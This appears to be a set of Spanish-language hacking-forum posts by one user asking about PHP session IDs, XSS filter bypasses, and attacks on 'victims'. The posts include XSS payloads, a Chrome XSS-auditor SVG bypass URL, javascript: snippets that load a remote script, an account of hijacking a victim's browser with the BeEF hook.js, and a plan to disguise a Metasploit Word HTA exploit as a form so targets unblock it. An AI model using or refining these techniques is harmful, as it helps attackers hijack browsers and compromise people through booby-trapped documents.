Muchisimas gracias engel lex! La desventajas que mencionas son bastante malas al parecer. Pero si usas un fingerprint del browser el atacante que llegue a sniffar no podría enviar una petición con las mismas cabeceras que la víctima y tratar de recrear el hash en base a dichas cabeceras? Qué parte tomarías de las cabeceras para generar el hash y que funciones de php usarias? Perdón por preguntar tanto, pero se que tenés experiencia en desarrollo y me podes ayudar a entender una buena forma de manejar las sesiones.

Gracias nuevamente y saludos!

Buenas! Los que sepan de PHP saben que session_regenerate_id() sirve para cambiar el ID de la sesión. Quería saber que opinaban del hecho de regenerar la sesión por cada cosa que hago, es decir por cada petición que mando. Si voy a login que cambie el id, si voy al panel de buscar usuarios, que se cambie el id, si voy a alguna funcion para listar algo, que se cambie, si voy a mi perfil, que se cambie... Qué opinan de hacer esto? Para mi es muy útil para mitigar robos de la cookie de sesión mediante sniffing cuando no usamos https... Pero tal vez hacer las cosas de éste modo tenga puntos en contra que no esté considerando.

Saludos!

Buenas, quería saber si de alguna forma se puede concretar un XSS en éste caso... En el campo de búsqueda introduzco:

dfgsdfg" onload=alert(1);

y en el fuente sale:

<input id="searchInput" type="text" value="dfgsdfg&quot; onload=alert(1);" placeholder="Buscar..." maxlength="100" name="search"

como vemos convierte a html entities los " y me impide escaparme del atributo...

Ésto me parece imposible de bypassear y con el tag value no podría ejecutar script mandando javascript:alert(1)... Se les acurre alguna forma? Gracias y saludos!

Muy buenas! Hace 3 días subieron un nuevo método para atacar a través de Word que según dice evita las advertencias de seguridad:

https://null-byte.wonderhowto.com/how-to/execute-code-microsoft-word-document-without-security-warnings-0180495/

pero no me parece tan bueno ya que el usuario tiene que aceptar dos ventanitas, y la segunda te pregunta si queres abrir un ejecutable, y me parece que hay que ser muy tonto para darle que si a ese cartel... Yo todavía me sigo quedando con el ataque anterior:

https://www.rapid7.com/db/modules/exploit/windows/fileformat/office_word_hta

con éste si lo abre y está desbloquedo, te metes casi instantaneamente, y si cerras el word no perdes la conexión, ya que la conexión está en otro proceso,  el punto en contra es que si lo descargas siempre aparece como bloqueado y te sale una notificacion que te dice que si no lo vas a editar que no lo desbloquees, pero que si vas a editar si. Entonces pensé en hacer que el archivo de word sea un formulario para descargar, completar y enviar, cosa que obligue a la victima a deslbloquearlo si quiere editar. El asunto es que el word que genera el metasploit esta todo en blanco con un cuadradito en el medio, y me gustaría poder agregar texto (un formulario) antes de que aparezca ese cuadradito. Pero no pude, traté de agregar texto y al agregarlo el exploit deja de funcionar. Tienen idea de cómo poder editar la apariencia del word que genera metasploit?

Saludos y gracias!

Cuando el hook.js se llega a cargar en el navegador de la víctima ya se secuestra el navegador, no hace falta nada más. Recién estuve fijándome lo que me decías de revisar las solicitudes, y ahí está el tema... Desde la consola del navegador no se envía ninguna consulta... Y la consola solo la estaba usando para probar, pero voy a ver que consulta se hace cuando mando directamente el enlace junto con esas lineas de codigo. Cuando lo pueda resolver escribo por aca. Saludos!


Actualizo!

Ya pude resolver el problema, en éste caso intente algo distinto. Utilicé:

javascript:open(//mi_dns/beef.html/)

y adentro de beef.html tengo:


con ésto pude secuestrar satisfactoriamente el navegador de la víctima a través de beEF bypasseando los ultimos filtros de chrome. Después me gustaría hacer un video explicando cómo lograr ésto y que hay que tener en cuenta para lograrlo.

Saludos!

 

Hola engel! Muchas gracias, es bastante parecido a lo que hice en mi tercer intento, pero no me está funcionando. Siendo más específico, lo que estaba queriendo hacer es incluir el hook.js de beEF utilizando éste bypass para los filtros de las versiones más nuevas de Chrome:

https://brutelogic.com.br/blog/chrome-xss-auditor-svg-bypass/

Que sería el siguiente:

https://brutelogic.com.br/xss.php?a=guest!+Watch+the+video+before+proceeding:%3Cbr%3E%3Cbr%3E%3Csvg+width=12cm+height=9cm%3E%3Ca%3E%3Cimage+href=//brutelogic.com.br/yt.jpg+/%3E%3Canimate+attributeName=href+values=javas%26%2399ript:alert(1)%3E

entonces yo pense que al final en vez de usar javascript:alert(1), podría incluir algo como lo que me mandaste vos, pero cuando pruebo en la consola del chrome no logro secuestrar mi navegador. Mira:



según lo que me responde la consola, el script parece haberse formado correctamente, pero sin embargo no logro secuestrar el navegador, sino en Online Browsers dentro del beEF ya tendría que ver la IP del navegador...

Tenés algúna idea sobre como resolver ésto? Saludos!

Buenas! la forma que conozco para agregar un script de otra página es:

<script src="www.web.com/script.js"></script>

pero si me encuentro realizando un XSS y necesito usar si o si "javascript:" y no al tag <script>, no sabría como incluir un js de otra pagina...

probé:

javascript:www.web.com/script.js

y no funciono,
tampoco funcionó:

javascript:src="www.web.com/script.js"

tampoco funcionó:

javascript:var script = document.createElement('script'); script.src = 'www.web.com/script.js'; document.head.appendChild(script);

Quería saber si tenían algún otra idea. Gracias desde ya!

Muchisimas gracias WHK! Entre ayer y hoy leí tu post sobre el arte del bypassing, y agregando ésto que me respondiste hoy me hiciste abrir la cabeza un montón. No tenía idea de la segunda capa de comprobación, y que solo bypasseando a ésta ya es suficiente para bypassear el sistema completo del navegador o de ISS. Estaría genial que escribieras un libro en español sobre todo lo que sabes de bypassing, ya que si bien hay mucha información dando vueltas, la mayoría está en inglés, y no está todo tan bien organizado y en un solo lugar como el post que hiciste por ejemplo. Gracias nuevamente.

Saludos!

Nono, el que decís vos creo que era el de ESET. Había que registrarse en desafioseset.com, ahora ya no encuentro la pagina, seguramente ya cerraron el server.

Saludos!

Impecable respuesta WHK!!! Te agradezco mucho por tu tiempo, y ya que te tengo te quería preguntar si las técnicas que mencionas en éste post:

http://foro.elhacker.net/nivel_web/tutotial_bypaseando_un_firewall_waf_mod_security_de_apache_y_filtros_de_iis-t449489.0.html

son todavía aplicables hoy en dia. En tal caso quedaría cubierto el salteo del firewall, del waf, y los filtros iis. Pero me gustaría también tener información sobre como saltear los filtros de Chrome por ejemplo, ya que lo último que había leído es un artículo de Elevenpaths del 2014:

http://blog.elevenpaths.com/2014/01/how-to-bypass-antixss-filter-in-chrome.html

Si tenés algún articulo que me pueda instruir sobre técnicas más actuales, estaría muy agradecido. ya me queda poco de la guía de prueba de OWASP, una vez que la termine me encataría leer en detalle tu post y también otra información sobre bypass a filtros de navegadores.

Muchas gracias nuevamente.

Saludos!